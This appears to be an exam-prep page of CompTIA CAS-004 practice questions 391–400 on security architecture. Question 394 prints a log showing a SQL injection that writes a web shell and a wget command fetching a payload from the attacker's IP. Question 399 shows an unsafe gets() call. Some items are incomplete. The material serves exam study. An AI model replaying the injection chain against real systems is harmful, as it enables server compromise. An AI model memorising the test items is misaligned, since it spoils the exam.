CAS-004 Exam Details

  • Exam Code: CAS-004
  • Exam Name: CompTIA Advanced Security Practitioner (CASP+)
  • Certification: CompTIA Certifications
  • Vendor: CompTIA
  • Total Questions: 792 Q&As
  • Last Updated: May 28, 2026

CompTIA CAS-004 Online Questions & Answers

  • Question 391:

    A retail organization wants to properly test and verify its capabilities to detect and/or prevent specific TTPs as mapped to the MITRE ATT&CK framework specific to APTs.

    Which of the following should be used by the organization to accomplish this goal?

    A. Tabletop exercise
    B. Penetration test
    C. Sandbox detonation
    D. Honeypot

  • Question 392:

    An enterprise is deploying APIs that utilize a private key and a public key to ensure the connection string is protected. To connect to the API, customers must use the private key. Which of the following would BEST secure the REST API connection to the database while preventing the use of a hard-coded string in the request string?

    A. Implement a VPN for all APIs.
    B. Sign the key with DSA.
    C. Deploy MFA for the service accounts.
    D. Utilize HMAC for the keys.

  • Question 393:

    A security team performed an external attack surface analysis and discovered the following issues on a group of application servers:

    1. The majority of the systems have end-of-life operating systems.

    2. The latest patches that are available are over two years old.

    3. The systems are considered mission critical for client support.

    4. The proprietary software running on the systems is not compatible with newer versions of the operating system.

    5. Server outages would negatively affect quarterly revenue projections.

    Which of the following would allow the security team to immediately mitigate the risks inherent to this situation?

    A. Implement a WAF between the application servers and the external perimeter.
    B. Contact the vendor for the proprietary software and negotiate a new maintenance contract.
    C. Document the application servers as being end of life and define a target date for decommission.
    D. Isolate the servers from the internet and configure an internal ACL, only allowing access to authorized employees.

  • Question 394:

    An analyst discovers the following while reviewing some recent activity logs:

    76.235.14.101 - - [07/Mar/2019:16:05:32 -0800] "GET /login.php HTTP/1.1" 200

    76.235.14.101 - - [07/Mar/2019:16:05:42 -0800] "GET /mainmenu.php 200

    210.84.11.202 - - [07/Mar/2019:16:05:49 -0800] "GET /login.php?password=UNION SELECT '', INTO OUTFILE '/var/www/html/cmd.php'; HTTP/1.1" 200

    210.84.11.202 - - [07/Mar/2019:16:05:15 -0800] "GET /cmd.php?cmd=wget%20http://210.84.11.202/sh99.php HTTP/1.1" 200

    76.235.14.101 - - [07/Mar/2019:16:05:35 -0800] "GET /addtocart.php?itemid=352849 200

    210.84.11.202 - - [07/Mar/2019:16:05:36 -0800] "GET /sh99.php HTTP/1.1" 200

    76.235.14.101 - - [07/Mar/2019:16:07:00 -0800] "GET /checkout.php?itemid=352849 200

    Which of the following tools would MOST likely identify a future incident in a timely manner?

    A. DDoS protection
    B. File integrity monitoring
    C. SCAP scanner
    D. Protocol analyzer

  • Question 395:

    An organization handles sensitive information that must be displayed on call center technicians' screens to verify the identities of remote callers. The technicians use three randomly selected fields of information to complete the identity verification process. Some of the fields contain PII that are unique identifiers for the remote callers. Which of the following should be implemented to identify remote callers while also reducing the risk that technicians could improperly use the identification information?

    A. Data masking
    B. Encryption
    C. Tokenization
    D. Scrubbing
    E. Substitution

  • Question 396:

    Several unlabeled documents in a cloud document repository contain cardholder information.

    Which of the following configuration changes should be made to the DLP system to correctly label these documents in the future?

    A. Digital rights management
    B. Network traffic decryption
    C. Regular expressions
    D. Watermarking

  • Question 397:

    SIMULATION

    An IPSec solution is being deployed. The configuration files for both the VPN concentrator and the AAA server are shown in the diagram.

    Complete the configuration files to meet the following requirements:

    1. The EAP method must use mutual certificate-based authentication (with issued client certificates).

    2. The IKEv2 cipher suite must be configured to the MOST secure authenticated mode of operation.

    3. The secret must contain at least one uppercase character, one lowercase character, one numeric character, and one special character, and it must meet a minimum length requirement of eight characters.

    INSTRUCTIONS

    Click on the AAA server and VPN concentrator to complete the configuration. Fill in the appropriate fields and make selections from the drop-down menus.

    If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

    A. Check the answer in explanation below.
    B. PlaceHolder
    C. PlaceHolder
    D. PlaceHolder

  • Question 398:

    An accounting team member received a voicemail message from someone who sounded like the Chief Financial Officer (CFO). In the voicemail message, the caller requested a wire transfer to a bank account the organization had not used before. Which of the following best describes this type of attack?

    A. The attacker used deepfake technology to simulate the CFO's voice.
    B. The CFO tried to commit a form of embezzlement.
    C. The attacker used caller ID spoofing to imitate the CFO's internal phone extension.
    D. The attacker successfully phished someone in the accounts payable department.

  • Question 399:

    A security architect examines a section of code and discovers the following:

    1. char username[20]

    2. char password[20]

    3. gets(username)

    4. checkUserExists(username)

    Which of the following changes should the security architect require before approving the code for release?

    A. Allow only alphanumeric characters for the username.
    B. Make the password variable longer to support more secure passwords.
    C. Prevent more than 20 characters from being entered.
    D. Add a password parameter to the checkUserExists function.

  • Question 400:

    A firewall administrator needs to ensure all traffic across the company network is inspected. The administrator gathers data and finds the following information regarding the typical traffic in the network:

    Which of the following is the BEST solution to ensure the administrator can complete the assigned task?

    A. A full-tunnel VPN
    B. Web content filtering
    C. An endpoint DLP solution
    D. SSL/TLS decryption
